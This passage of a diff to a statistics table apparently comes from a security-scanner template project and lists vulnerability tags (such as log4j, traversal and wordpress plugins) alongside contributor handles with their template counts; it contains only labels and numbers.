suman_kar | 12 | | | | | | | +| auth-bypass | 69 | cyllective | 11 | | | | | | | +| cms | 67 | elsfa7110 | 11 | | | | | | | +| file | 66 | dogasantos | 11 | | | | | | | +| oracle | 63 | wdahlenb | 11 | | | | | | | +| install | 63 | logicalhunter | 10 | | | | | | | | intrusive | 60 | nadino | 10 | | | | | | | | seclists | 58 | hackergautam | 10 | | | | | | | -| disclosure | 57 | logicalhunter | 10 | | | | | | | -| oss | 52 | meme-lord | 10 | | | | | | | +| disclosure | 57 | meme-lord | 10 | | | | | | | +| oss | 52 | alph4byt3 | 10 | | | | | | | | cisco | 50 | random_robbie | 10 | | | | | | | -| cve2016 | 49 | emadshanab | 9 | | | | | | | +| cve2016 | 49 | oppsec | 9 | | | | | | | | google | 48 | 0x240x23elu | 9 | | | | | | | -| fileupload | 47 | oppsec | 9 | | | | | | | -| cve2015 | 47 | zh | 8 | | | | | | | -| adobe | 45 | iamthefrogy | 8 | | | | | | | -| logs | 42 | veshraj | 8 | | | | | | | -| aem | 42 | aashiq | 8 | | | | | | | -| plugin | 41 | that_juan_ | 8 | | | | | | | +| cve2015 | 47 | emadshanab | 9 | | | | | | | +| fileupload | 47 | zh | 8 | | | | | | | +| adobe | 45 | that_juan_ | 8 | | | | | | | +| aem | 42 | iamthefrogy | 8 | | | | | | | +| logs | 42 | aashiq | 8 | | | | | | | | cve2014 | 41 | lu4nx | 8 | | | | | | | -| hackerone | 41 | leovalcante | 7 | | | | | | | -| debug | 40 | randomstr1ng | 7 | | | | | | | -| vmware | 39 | amit-jd | 7 | | | | | | | -| vulhub | 38 | its0x08 | 7 | | | | | | | -| atlassian | 38 | divya_mudgal | 7 | | | | | | | -| tenable | 36 | harshbothra_ | 7 | | | | | | | -| traversal | 35 | caspergn | 7 | | | | | | | -| springboot | 35 | _0xf4n9x_ | 7 | | | | | | | -| injection | 34 | dr_set | 7 | | | | | | | -| jira | 32 | theabhinavgaur | 7 | | | | | | | -| huntr | 32 | techryptic (@tech) | 7 | | | | | | | -| generic | 31 | kophjager007 | 7 | | | | | | | -| kubernetes | 31 | iamnoooob | 6 | | | | | | | -| listing | 31 | praetorian-thendrickson | 6 | | | | | | | -| dns | 27 | __fazal | 6 | | | | | | | -| log4j | 26 | imnightmaree | 6 | | | | | | | -| sap | 25 | rootxharsh | 6 | | | | | | | -| microsoft | 25 | pathtaga | 6 | | | | | | | -| cnvd | 25 | pentest_swissky | 6 | | | | | | | -| aws | 25 | forgedhallpass | 6 | | | | | | | -| misc | 25 | evan rubinstein | 6 | | | | | | | -| proxy | 23 | gitlab red team | 6 | | | | | | | -| jndi | 23 | nullfuzz | 6 | | | | | | | -| fuzz | 22 | puzzlepeaches | 6 | | | | | | | -| zoho | 22 | clem9669 | 5 | | | | | | | -| manageengine | 22 | robotshell | 5 | | | | | | | -| php | 22 | 0xlittleboy | 5 | | | | | | | -| cve2012 | 21 | xelkomy | 5 | | | | | | | -| wp-theme | 21 | joanbono | 5 | | | | | | | -| api | 21 | podalirius | 5 | | | | | | | -| cloud | 20 | prajiteshsingh | 5 | | | | | | | -| k8s | 20 | nodauf | 5 | | | | | | | -| weblogic | 20 | panch0r3d | 5 | | | | | | | -| cicd | 20 | yanyun | 5 | | | | | | | -| deserialization | 20 | ganofins | 5 | | | | | | | -| tomcat | 19 | shine | 4 | | | | | | | -| ibm | 19 | wisnupramoedya | 4 | | | | | | | -| camera | 19 | 3th1c_yuk1 | 4 | | | | | | | +| plugin | 41 | veshraj | 8 | | | | | | | +| hackerone | 41 | techryptic (@tech) | 7 | | | | | | | +| debug | 40 | caspergn | 7 | | | | | | | +| vmware | 39 | dr_set | 7 | | | | | | | +| vulhub | 38 | _0xf4n9x_ | 7 | | | | | | | +| atlassian | 38 | leovalcante | 7 | | | | | | | +| tenable | 36 | its0x08 | 7 | | | | | | | +| springboot | 35 | theabhinavgaur | 7 | | | | | | | +| traversal | 35 | kophjager007 | 7 | | | | | | | +| injection | 34 | harshbothra_ | 7 | | | | | | | +| huntr | 32 | divya_mudgal | 7 | | | | | | | +| generic | 32 | amit-jd | 7 | | | | | | | +| jira | 32 | randomstr1ng | 7 | | | | | | | +| kubernetes | 31 | pathtaga | 6 | | | | | | | +| listing | 31 | __fazal | 6 | | | | | | | +| dns | 27 | evan rubinstein | 6 | | | | | | | +| log4j | 26 | iamnoooob | 6 | | | | | | | +| cnvd | 25 | puzzlepeaches | 6 | | | | | | | +| misc | 25 | forgedhallpass | 6 | | | | | | | +| sap | 25 | praetorian-thendrickson | 6 | | | | | | | +| aws | 25 | rootxharsh | 6 | | | | | | | +| microsoft | 25 | pentest_swissky | 6 | | | | | | | +| proxy | 23 | nullfuzz | 6 | | | | | | | +| jndi | 23 | imnightmaree | 6 | | | | | | | +| fuzz | 22 | gitlab red team | 6 | | | | | | | +| manageengine | 22 | panch0r3d | 5 | | | | | | | +| zoho | 22 | joanbono | 5 | | | | | | | +| php | 22 | nodauf | 5 | | | | | | | +| wp-theme | 21 | podalirius | 5 | | | | | | | +| cve2012 | 21 | prajiteshsingh | 5 | | | | | | | +| api | 21 | clem9669 | 5 | | | | | | | +| k8s | 20 | ganofins | 5 | | | | | | | +| weblogic | 20 | xelkomy | 5 | | | | | | | +| cicd | 20 | 0xlittleboy | 5 | | | | | | | +| deserialization | 20 | yanyun | 5 | | | | | | | +| cloud | 20 | robotshell | 5 | | | | | | | +| camera | 19 | defr0ggy | 4 | | | | | | | +| tomcat | 19 | r3naissance | 4 | | | | | | | +| ibm | 19 | dolev farhi | 4 | | | | | | | | dlink | 18 | e_schultze_ | 4 | | | | | | | -| gitlab | 18 | dadevel | 4 | | | | | | | -| firewall | 17 | r3naissance | 4 | | | | | | | -| jenkins | 17 | dolev farhi | 4 | | | | | | | -| ftp | 17 | s0obi | 4 | | | | | | | -| wavlink | 17 | tanq16 | 4 | | | | | | | -| struts | 17 | powerexploit | 4 | | | | | | | -| service | 17 | scent2d | 4 | | | | | | | -| msf | 16 | h1ei1 | 4 | | | | | | | -| printer | 16 | defr0ggy | 4 | | | | | | | -| nginx | 15 | incogbyte | 4 | | | | | | | -| amazon | 15 | jarijaas | 3 | | | | | | | -| cve2009 | 15 | yash anand @yashanand155 | 3 | | | | | | | -| xxe | 15 | supras | 3 | | | | | | | -| fortinet | 15 | emenalf | 3 | | | | | | | -| cve2011 | 15 | fxploit | 3 | | | | | | | +| gitlab | 18 | h1ei1 | 4 | | | | | | | +| struts | 17 | incogbyte | 4 | | | | | | | +| ftp | 17 | scent2d | 4 | | | | | | | +| jenkins | 17 | shine | 4 | | | | | | | +| firewall | 17 | s0obi | 4 | | | | | | | +| wavlink | 17 | 3th1c_yuk1 | 4 | | | | | | | +| service | 17 | dadevel | 4 | | | | | | | +| printer | 16 | wisnupramoedya | 4 | | | | | | | +| msf | 16 | tanq16 | 4 | | | | | | | +| fortinet | 15 | powerexploit | 4 | | | | | | | +| xxe | 15 | impramodsargar | 3 | | | | | | | +| amazon | 15 | andydoering | 3 | | | | | | | +| cve2011 | 15 | hahwul | 3 | | | | | | | +| cve2009 | 15 | sushantkamble | 3 | | | | | | | +| nginx | 15 | ekrause | 3 | | | | | | | +| java | 14 | evergreencartoons | 3 | | | | | | | | domainmod | 14 | huowuzhao | 3 | | | | | | | -| lfr | 14 | z3bd | 3 | | | | | | | -| java | 14 | hahwul | 3 | | | | | | | -| hp | 14 | atomiczsec | 3 | | | | | | | -| status | 14 | evergreencartoons | 3 | | | | | | | -| android | 14 | lucasljm2001 | 3 | | | | | | | -| cve2008 | 13 | mr-xn | 3 | | | | | | | -| woocommerce | 13 | johnjhacking | 3 | | | | | | | -| abstractapi | 13 | whoever | 3 | | | | | | | -| cve2013 | 13 | sushantkamble | 3 | | | | | | | -| magento | 13 | dr0pd34d | 3 | | | | | | | -| confluence | 13 | davidmckennirey | 3 | | | | | | | -| graphql | 12 | ambassify | 3 | | | | | | | -| microweber | 12 | swissky | 3 | | | | | | | -| rails | 12 | shifacyclewala | 3 | | | | | | | -| github | 12 | f1tz | 3 | | | | | | | -| vpn | 12 | kh4sh3i | 3 | | | | | | | -| netsweeper | 12 | mavericknerd | 3 | | | | | | | -| fortigate | 12 | impramodsargar | 3 | | | | | | | -| drupal | 12 | ekrause | 3 | | | | | | | -| netgear | 12 | 0w4ys | 3 | | | | | | | -| backup | 12 | dudez | 3 | | | | | | | -| zyxel | 12 | arcc | 3 | | | | | | | -| ruijie | 12 | fyoorer | 3 | | | | | | | -| cnvd2021 | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| mail | 11 | me9187 | 3 | | | | | | | -| ssl | 11 | binaryfigments | 3 | | | | | | | -| airflow | 11 | _generic_human_ | 3 | | | | | | | +| hp | 14 | alifathi-h1 | 3 | | | | | | | +| status | 14 | atomiczsec | 3 | | | | | | | +| android | 14 | f1tz | 3 | | | | | | | +| lfr | 14 | shifacyclewala | 3 | | | | | | | +| cve2008 | 13 | dr0pd34d | 3 | | | | | | | +| woocommerce | 13 | z3bd | 3 | | | | | | | +| magento | 13 | fxploit | 3 | | | | | | | +| abstractapi | 13 | fyoorer | 3 | | | | | | | +| confluence | 13 | whoever | 3 | | | | | | | +| cve2013 | 13 | binaryfigments | 3 | | | | | | | +| drupal | 12 | emenalf | 3 | | | | | | | +| netsweeper | 12 | lucasljm2001 | 3 | | | | | | | +| microweber | 12 | ambassify | 3 | | | | | | | +| fortigate | 12 | lark-lab | 3 | | | | | | | +| zyxel | 12 | supras | 3 | | | | | | | +| ruijie | 12 | yash anand @yashanand155 | 3 | | | | | | | +| rails | 12 | swissky | 3 | | | | | | | +| vpn | 12 | mr-xn | 3 | | | | | | | +| netgear | 12 | dudez | 3 | | | | | | | +| backup | 12 | 0w4ys | 3 | | | | | | | +| graphql | 12 | arcc | 3 | | | | | | | +| github | 12 | me9187 | 3 | | | | | | | | backdoor | 11 | unstabl3 | 3 | | | | | | | -| webserver | 11 | skeltavik | 3 | | | | | | | -| cisa | 11 | andydoering | 3 | | | | | | | -| azure | 11 | thomas_from_offensity | 3 | | | | | | | -| dell | 10 | alifathi-h1 | 3 | | | | | | | -| spring | 10 | ph33r | 3 | | | | | | | -| git | 10 | splint3r7 | 3 | | | | | | | -| jolokia | 10 | lark-lab | 3 | | | | | | | -| grafana | 10 | amsda | 2 | | | | | | | -| django | 10 | luci | 2 | | | | | | | -| laravel | 10 | ree4pwn | 2 | | | | | | | -| glpi | 10 | geekby | 2 | | | | | | | -| coldfusion | 10 | g4l1t0 | 2 | | | | | | | -| admin | 10 | sbani | 2 | | | | | | | -| ruby | 10 | parth | 2 | | | | | | | -| ssh | 9 | cocxanh | 2 | | | | | | | -| kube | 9 | foulenzer | 2 | | | | | | | -| prometheus | 9 | afaq | 2 | | | | | | | -| zimbra | 9 | thezakman | 2 | | | | | | | -| wso2 | 9 | dbrwsky | 2 | | | | | | | -| dedecms | 9 | raesene | 2 | | | | | | | -| sonicwall | 9 | 0xelkomy | 2 | | | | | | | -| zabbix | 9 | taielab | 2 | | | | | | | -| ssti | 9 | bing0o | 2 | | | | | | | -| fastjson | 9 | danielmofer | 2 | | | | | | | -| scada | 9 | github.com/its0x08 | 2 | | | | | | | -| vcenter | 9 | udit_thakkur | 2 | | | | | | | -| versa | 9 | r12w4n | 2 | | | | | | | -| windows | 9 | hackerarpan | 2 | | | | | | | -| iis | 9 | uomogrande | 2 | | | | | | | -| npm | 9 | 0xsmiley | 2 | | | | | | | -| phpmyadmin | 9 | joeldeleep | 2 | | | | | | | -| metadata | 8 | dahse89 | 2 | | | | | | | -| jetbrains | 8 | joshlarsen | 2 | | | | | | | -| kafka | 8 | lotusdll | 2 | | | | | | | -| db | 8 | sinkettu | 2 | | | | | | | -| citrix | 8 | y4er | 2 | | | | | | | -| hms | 8 | gal nagli | 2 | | | | | | | -| solr | 8 | bsysop | 2 | | | | | | | -| bucket | 8 | 0xnirvana | 2 | | | | | | | -| symfony | 8 | gevakun | 2 | | | | | | | -| headless | 8 | nybble04 | 2 | | | | | | | -| jboss | 8 | dheerajmadhukar | 2 | | | | | | | +| cisa | 11 | yuzhe-zhang-0 | 3 | | | | | | | +| mail | 11 | thomas_from_offensity | 3 | | | | | | | +| cnvd2021 | 11 | skeltavik | 3 | | | | | | | +| airflow | 11 | _generic_human_ | 3 | | | | | | | +| ssl | 11 | johnjhacking | 3 | | | | | | | +| azure | 11 | splint3r7 | 3 | | | | | | | +| webserver | 11 | kh4sh3i | 3 | | | | | | | +| laravel | 10 | davidmckennirey | 3 | | | | | | | +| git | 10 | mavericknerd | 3 | | | | | | | +| grafana | 10 | ph33r | 3 | | | | | | | +| django | 10 | jarijaas | 3 | | | | | | | +| jolokia | 10 | canberbamber | 2 | | | | | | | +| coldfusion | 10 | paperpen | 2 | | | | | | | +| ruby | 10 | z0ne | 2 | | | | | | | +| dell | 10 | 0xrudra | 2 | | | | | | | +| spring | 10 | badboycxcc | 2 | | | | | | | +| glpi | 10 | gevakun | 2 | | | | | | | +| admin | 10 | n-thumann | 2 | | | | | | | +| versa | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| prometheus | 9 | socketz | 2 | | | | | | | +| scada | 9 | bing0o | 2 | | | | | | | +| dedecms | 9 | hackerarpan | 2 | | | | | | | +| zimbra | 9 | smaranchand | 2 | | | | | | | +| zabbix | 9 | r12w4n | 2 | | | | | | | +| ssh | 9 | dheerajmadhukar | 2 | | | | | | | +| phpmyadmin | 9 | thezakman | 2 | | | | | | | +| ssti | 9 | 0xprial | 2 | | | | | | | +| wso2 | 9 | bsysop | 2 | | | | | | | +| fastjson | 9 | rafaelwdornelas | 2 | | | | | | | +| sonicwall | 9 | koti2 | 2 | | | | | | | +| windows | 9 | ree4pwn | 2 | | | | | | | +| iis | 9 | kishore-hariram | 2 | | | | | | | +| kube | 9 | c3l3si4n | 2 | | | | | | | +| npm | 9 | v0idc0de | 2 | | | | | | | +| vcenter | 9 | vavkamil | 2 | | | | | | | +| audit | 8 | randomrobbie | 2 | | | | | | | +| recon | 8 | nybble04 | 2 | | | | | | | +| cisco-switch | 8 | 0xnirvana | 2 | | | | | | | +| hms | 8 | g4l1t0 | 2 | | | | | | | +| bucket | 8 | redteambrasil | 2 | | | | | | | +| mirai | 8 | mohammedsaneem | 2 | | | | | | | +| headless | 8 | clarkvoss | 2 | | | | | | | +| firebase | 8 | moritz nentwig | 2 | | | | | | | +| config-audit | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| solr | 8 | 0xsapra | 2 | | | | | | | +| jetbrains | 8 | sinkettu | 2 | | | | | | | +| citrix | 8 | k11h-de | 2 | | | | | | | +| kafka | 8 | 0xcrypto | 2 | | | | | | | +| db | 8 | brenocss | 2 | | | | | | | +| metadata | 8 | github.com/its0x08 | 2 | | | | | | | +| jboss | 8 | bernardofsr | 2 | | | | | | | +| auth | 8 | sy3omda | 2 | | | | | | | +| symfony | 8 | notnotnotveg | 2 | | | | | | | | solarview | 8 | korteke | 2 | | | | | | | -| recon | 8 | v0idc0de | 2 | | | | | | | -| config-audit | 8 | mohammedsaneem | 2 | | | | | | | -| audit | 8 | notnotnotveg | 2 | | | | | | | -| docker | 8 | israel comazzetto dos reis | 2 | | | | | | | -| elasticsearch | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| mirai | 8 | myztique | 2 | | | | | | | -| auth | 8 | randomrobbie | 2 | | | | | | | -| cisco-switch | 8 | bp0lr | 2 | | | | | | | -| firebase | 8 | manas_harsh | 2 | | | | | | | -| ognl | 7 | kiblyn11 | 2 | | | | | | | -| nodejs | 7 | socketz | 2 | | | | | | | -| blind | 7 | ajaysenr | 2 | | | | | | | -| emerge | 7 | c3l3si4n | 2 | | | | | | | -| samsung | 7 | redteambrasil | 2 | | | | | | | -| ofbiz | 7 | true13 | 2 | | | | | | | -| thinkphp | 7 | rafaelwdornelas | 2 | | | | | | | -| cache | 7 | hetroublemakr | 2 | | | | | | | -| python | 7 | kre80r | 2 | | | | | | | -| exchange | 7 | paperpen | 2 | | | | | | | -| cnvd2020 | 7 | martincodes-de | 2 | | | | | | | -| squirrelmail | 7 | canberbamber | 2 | | | | | | | -| druid | 7 | 666asd | 2 | | | | | | | -| detect | 7 | 0xsapra | 2 | | | | | | | -| icewarp | 7 | convisoappsec | 2 | | | | | | | -| crlf | 7 | d4vy | 2 | | | | | | | -| maps | 7 | moritz nentwig | 2 | | | | | | | -| opencats | 7 | paradessia | 2 | | | | | | | -| go | 7 | sy3omda | 2 | | | | | | | -| seeyon | 7 | zomsop82 | 2 | | | | | | | -| lucee | 6 | nuk3s3c | 2 | | | | | | | -| vms | 6 | vsh00t | 2 | | | | | | | -| openvpn | 6 | bernardofsr | 2 | | | | | | | -| huawei | 6 | 0xprial | 2 | | | | | | | -| redis | 6 | x1m_martijn | 2 | | | | | | | -| filemanager | 6 | k11h-de | 2 | | | | | | | -| bigip | 6 | brenocss | 2 | | | | | | | -| opensis | 6 | badboycxcc | 2 | | | | | | | -| rconfig | 6 | thardt-praetorian | 2 | | | | | | | -| moodle | 6 | fabaff | 2 | | | | | | | -| database | 6 | smaranchand | 2 | | | | | | | -| cobbler | 6 | koti2 | 2 | | | | | | | +| elasticsearch | 8 | bp0lr | 2 | | | | | | | +| cache | 8 | parth | 2 | | | | | | | +| docker | 8 | hetroublemakr | 2 | | | | | | | +| opencats | 7 | kiblyn11 | 2 | | | | | | | +| nodejs | 7 | kre80r | 2 | | | | | | | +| ofbiz | 7 | zomsop82 | 2 | | | | | | | +| druid | 7 | uomogrande | 2 | | | | | | | +| crlf | 7 | 8arthur | 2 | | | | | | | +| exchange | 7 | joeldeleep | 2 | | | | | | | +| blind | 7 | paradessia | 2 | | | | | | | +| seeyon | 7 | codexlynx | 2 | | | | | | | +| samsung | 7 | wa1tf0rme | 2 | | | | | | | +| icewarp | 7 | 0xsmiley | 2 | | | | | | | +| python | 7 | foulenzer | 2 | | | | | | | +| maps | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| emerge | 7 | cocxanh | 2 | | | | | | | +| squirrelmail | 7 | dbrwsky | 2 | | | | | | | +| thinkphp | 7 | ehsahil | 2 | | | | | | | +| cnvd2020 | 7 | sbani | 2 | | | | | | | +| go | 7 | geekby | 2 | | | | | | | +| detect | 7 | manas_harsh | 2 | | | | | | | +| ognl | 7 | israel comazzetto dos reis | 2 | | | | | | | +| moodle | 6 | dahse89 | 2 | | | | | | | +| database | 6 | ajaysenr | 2 | | | | | | | +| activemq | 6 | y4er | 2 | | | | | | | +| opensis | 6 | taielab | 2 | | | | | | | | jetty | 6 | bananabr | 2 | | | | | | | -| activemq | 6 | 0xcrypto | 2 | | | | | | | -| ecology | 6 | vavkamil | 2 | | | | | | | -| sitecore | 6 | wa1tf0rme | 2 | | | | | | | -| microstrategy | 6 | clarkvoss | 2 | | | | | | | -| kubelet | 6 | 0xrudra | 2 | | | | | | | -| node | 6 | kishore-hariram | 2 | | | | | | | -| magmi | 6 | shelled | 2 | | | | | | | -| smtp | 6 | cckuakilong | 2 | | | | | | | -| websphere | 6 | nkxxkn | 2 | | | | | | | -| zhiyuan | 6 | megamansec | 2 | | | | | | | -| liferay | 6 | pxmme1337 | 2 | | | | | | | -| slack | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| enum | 6 | w4cky_ | 2 | | | | | | | -| jamf | 6 | n-thumann | 2 | | | | | | | -| artica | 6 | ricardo maia (brainfork) | 2 | | | | | | | -| keycloak | 6 | codexlynx | 2 | | | | | | | -| elfinder | 6 | z0ne | 2 | | | | | | | -| bypass | 6 | ehsahil | 2 | | | | | | | -| setup | 6 | nvn1729 | 2 | | | | | | | -| fpd | 6 | 8arthur | 2 | | | | | | | -| gocd | 5 | vzamanillo | 1 | | | | | | | -| minio | 5 | fopina | 1 | | | | | | | -| apisix | 5 | kurohost | 1 | | | | | | | -| scan | 5 | bernardo rodrigues | 1 | | | | | | | +| redis | 6 | afaq | 2 | | | | | | | +| kubelet | 6 | w4cky_ | 2 | | | | | | | +| ecology | 6 | d4vy | 2 | | | | | | | +| rconfig | 6 | luci | 2 | | | | | | | +| jamf | 6 | 666asd | 2 | | | | | | | +| huawei | 6 | true13 | 2 | | | | | | | +| filemanager | 6 | convisoappsec | 2 | | | | | | | +| elfinder | 6 | megamansec | 2 | | | | | | | +| cobbler | 6 | gal nagli | 2 | | | | | | | +| microstrategy | 6 | udit_thakkur | 2 | | | | | | | +| sitecore | 6 | danielmofer | 2 | | | | | | | +| bypass | 6 | amsda | 2 | | | | | | | +| slack | 6 | cckuakilong | 2 | | | | | | | +| openvpn | 6 | raesene | 2 | | | | | | | +| fpd | 6 | vsh00t | 2 | | | | | | | +| zhiyuan | 6 | nvn1729 | 2 | | | | | | | +| magmi | 6 | nkxxkn | 2 | | | | | | | +| bigip | 6 | lotusdll | 2 | | | | | | | +| enum | 6 | myztique | 2 | | | | | | | +| lucee | 6 | shelled | 2 | | | | | | | +| node | 6 | joshlarsen | 2 | | | | | | | +| smtp | 6 | thardt-praetorian | 2 | | | | | | | +| websphere | 6 | x1m_martijn | 2 | | | | | | | +| vms | 6 | fabaff | 2 | | | | | | | +| setup | 6 | martincodes-de | 2 | | | | | | | +| keycloak | 6 | pxmme1337 | 2 | | | | | | | +| liferay | 6 | nuk3s3c | 2 | | | | | | | +| s3 | 6 | 0xelkomy | 2 | | | | | | | +| artica | 6 | andysvints | 1 | | | | | | | +| prestashop | 5 | s1r1u5_ | 1 | | | | | | | +| alibaba | 5 | pjborah | 1 | | | | | | | +| error | 5 | danigoland | 1 | | | | | | | +| apisix | 5 | nielsing | 1 | | | | | | | +| solarwinds | 5 | luqman | 1 | | | | | | | +| vbulletin | 5 | mubassirpatel | 1 | | | | | | | +| scan | 5 | open-sec | 1 | | | | | | | +| fatpipe | 5 | francescocarlucci | 1 | | | | | | | +| avideo | 5 | f1she3 | 1 | | | | | | | +| akamai | 5 | af001 | 1 | | | | | | | +| strapi | 5 | jaimin gondaliya | 1 | | | | | | | +| leak | 5 | h4kux | 1 | | | | | | | +| storage | 5 | exid | 1 | | | | | | | +| circarlife | 5 | remi gascou (podalirius) | 1 | | | | | | | +| elastic | 5 | bjhulst | 1 | | | | | | | +| gocd | 5 | brabbit10 | 1 | | | | | | | +| cockpit | 5 | miryangjung | 1 | | | | | | | +| rfi | 5 | pry0cc | 1 | | | | | | | +| 74cms | 5 | tirtha | 1 | | | | | | | +| fortios | 5 | 0h1in9e | 1 | | | | | | | +| carrental | 5 | phyr3wall | 1 | | | | | | | +| metinfo | 5 | couskito | 1 | | | | | | | +| minio | 5 | nobody | 1 | | | | | | | +| firmware | 5 | ahmetpergamum | 1 | | | | | | | +| rseenet | 5 | calumjelrick | 1 | | | | | | | +| mongodb | 5 | jbaines-r7 | 1 | | | | | | | +| symantec | 5 | qlkwej | 1 | | | | | | | +| awstats | 5 | kabirsuda | 1 | | | | | | | +| nagios | 5 | hanlaomo | 1 | | | | | | | +| cacti | 5 | lrtk-coder | 1 | | | | | | | +| parallels | 5 | shiar | 1 | | | | | | | +| gogs | 5 | exceed | 1 | | | | | | | +| ec2 | 5 | amanrawat | 1 | | | | | | | +| plesk | 5 | cookiehanhoan | 1 | | | | | | | +| typo3 | 4 | failopen | 1 | | | | | | | +| redmine | 4 | p-l- | 1 | | | | | | | +| beyondtrust | 4 | rodnt | 1 | | | | | | | +| console | 4 | ahmed sherif | 1 | | | | | | | +| xmlrpc | 4 | geraldino2 | 1 | | | | | | | +| tenda | 4 | thevillagehacker | 1 | | | | | | | +| thinkcmf | 4 | arjunchandarana | 1 | | | | | | | +| ruckus | 4 | willd96 | 1 | | | | | | | +| sangfor | 4 | ola456 | 1 | | | | | | | +| roxy | 4 | aayush vishnoi | 1 | | | | | | | +| axigen | 4 | yuansec | 1 | | | | | | | +| mautic | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| zend | 4 | 0xceeb | 1 | | | | | | | +| mikrotik | 4 | 8authur | 1 | | | | | | | +| hikvision | 4 | natto97 | 1 | | | | | | | +| httpserver | 4 | notsoevilweasel | 1 | | | | | | | +| nexus | 4 | nytr0gen | 1 | | | | | | | +| digitalocean | 4 | jteles | 1 | | | | | | | +| jellyfin | 4 | b0rn2r00t | 1 | | | | | | | +| sonarqube | 4 | shreyapohekar | 1 | | | | | | | +| geoserver | 4 | mihhailsokolov | 1 | | | | | | | +| yeswiki | 4 | flag007 | 1 | | | | | | | +| aspose | 4 | kailashbohara | 1 | | | | | | | +| hongdian | 4 | unkl4b | 1 | | | | | | | +| log | 4 | zinminphy0 | 1 | | | | | | | +| candidats | 4 | caon | 1 | | | | | | | +| sql | 4 | ramkrishna sawant | 1 | | | | | | | +| panos | 4 | elitebaz | 1 | | | | | | | +| gitea | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| flink | 4 | screamy | 1 | | | | | | | +| ampache | 4 | alperenkesk | 1 | | | | | | | +| springcloud | 4 | ringo | 1 | | | | | | | +| adminer | 4 | _harleo | 1 | | | | | | | +| caucho | 4 | rivalsec | 1 | | | | | | | +| photo | 4 | ipanda | 1 | | | | | | | +| openemr | 4 | arr0way | 1 | | | | | | | +| stripe | 4 | liquidsec | 1 | | | | | | | +| zte | 4 | yashanand155 | 1 | | | | | | | +| tikiwiki | 4 | daffianfo | 1 | | | | | | | +| kentico | 4 | deena | 1 | | | | | | | +| terramaster | 4 | b0yd | 1 | | | | | | | +| couchdb | 4 | akshansh | 1 | | | | | | | +| oa | 4 | wabafet | 1 | | | | | | | +| dropbear | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| wcs | 4 | daviey | 1 | | | | | | | +| mailchimp | 4 | schniggie | 1 | | | | | | | +| voip | 4 | ayadi | 1 | | | | | | | +| rabbitmq | 4 | alex | 1 | | | | | | | +| prtg | 4 | mantissts | 1 | | | | | | | +| microfocus | 4 | xstp | 1 | | | | | | | +| horde | 4 | sickwell | 1 | | | | | | | +| hpe | 4 | ok_bye_now | 1 | | | | | | | +| hoteldruid | 4 | th3.d1p4k | 1 | | | | | | | +| cve2007 | 4 | 0xd0ff9 | 1 | | | | | | | +| telerik | 4 | blckraven | 1 | | | | | | | +| hashicorp | 4 | intx0x80 | 1 | | | | | | | +| nosqli | 4 | ransomsec | 1 | | | | | | | +| ems | 4 | luskabol | 1 | | | | | | | +| phpinfo | 4 | secthebit | 1 | | | | | | | +| kevinlab | 4 | jaskaran | 1 | | | | | | | +| puppet | 4 | ggranjus | 1 | | | | | | | +| spark | 4 | 0xteles | 1 | | | | | | | +| phppgadmin | 4 | furkansayim | 1 | | | | | | | +| cnvd2019 | 4 | exploitation | 1 | | | | | | | +| oauth | 4 | w0tx | 1 | | | | | | | +| postmessage | 4 | hakluke | 1 | | | | | | | +| hybris | 4 | oscarintherocks | 1 | | | | | | | +| sendgrid | 4 | alevsk | 1 | | | | | | | +| asp | 4 | coldfish | 1 | | | | | | | +| search | 4 | alexrydzak | 1 | | | | | | | +| concrete | 4 | pdp | 1 | | | | | | | +| artifactory | 4 | ptonewreckin | 1 | | | | | | | +| resin | 4 | ahmed abou-ela | 1 | | | | | | | +| royalevent | 4 | viondexd | 1 | | | | | | | +| kibana | 4 | 2rs3c | 1 | | | | | | | +| bmc | 4 | mesaglio | 1 | | | | | | | +| gnuboard | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| linkerd | 4 | carlosvieira | 1 | | | | | | | +| paypal | 4 | aaronchen0 | 1 | | | | | | | +| vrealize | 4 | thebinitghimire | 1 | | | | | | | +| sophos | 4 | ilovebinbash | 1 | | | | | | | +| telesquare | 4 | mah3sec_ | 1 | | | | | | | +| umbraco | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| firmware | 5 | mukundbhuva | 1 | | | | | | | -| fortios | 5 | d0rkerdevil | 1 | | | | | | | -| awstats | 5 | 0xrod | 1 | | | | | | | -| rfi | 5 | jaimin gondaliya | 1 | | | | | | | -| cacti | 5 | ahmetpergamum | 1 | | | | | | | -| 74cms | 5 | realexp3rt | 1 | | | | | | | -| mongodb | 5 | sherlocksecurity | 1 | | | | | | | -| vbulletin | 5 | tehtbl | 1 | | | | | | | -| error | 5 | kba@sogeti_esec | 1 | | | | | | | -| leak | 5 | djoevanka | 1 | | | | | | | -| storage | 5 | yuansec | 1 | | | | | | | -| avideo | 5 | jcockhren | 1 | | | | | | | -| cockpit | 5 | becivells | 1 | | | | | | | -| prestashop | 5 | ahmed abou-ela | 1 | | | | | | | -| circarlife | 5 | allenwest24 | 1 | | | | | | | -| fatpipe | 5 | udinchan | 1 | | | | | | | -| metinfo | 5 | httpvoid | 1 | | | | | | | -| alibaba | 5 | secthebit | 1 | | | | | | | -| parallels | 5 | igibanez | 1 | | | | | | | -| elastic | 5 | narluin | 1 | | | | | | | -| ec2 | 5 | daviey | 1 | | | | | | | -| solarwinds | 5 | hakimkt | 1 | | | | | | | -| strapi | 5 | amanrawat | 1 | | | | | | | -| plesk | 5 | manuelbua | 1 | | | | | | | -| s3 | 5 | iampritam | 1 | | | | | | | -| carrental | 5 | duty_1g | 1 | | | | | | | -| rseenet | 5 | clment cruchet | 1 | | | | | | | -| gogs | 5 | knassar702 | 1 | | | | | | | -| symantec | 5 | nerrorsec | 1 | | | | | | | -| nagios | 5 | ooooooo_q | 1 | | | | | | | -| hybris | 4 | makyotox | 1 | | | | | | | -| hoteldruid | 4 | florianmaak | 1 | | | | | | | -| nosqli | 4 | yavolo | 1 | | | | | | | -| sonarqube | 4 | kareemse1im | 1 | | | | | | | -| search | 4 | sshell | 1 | | | | 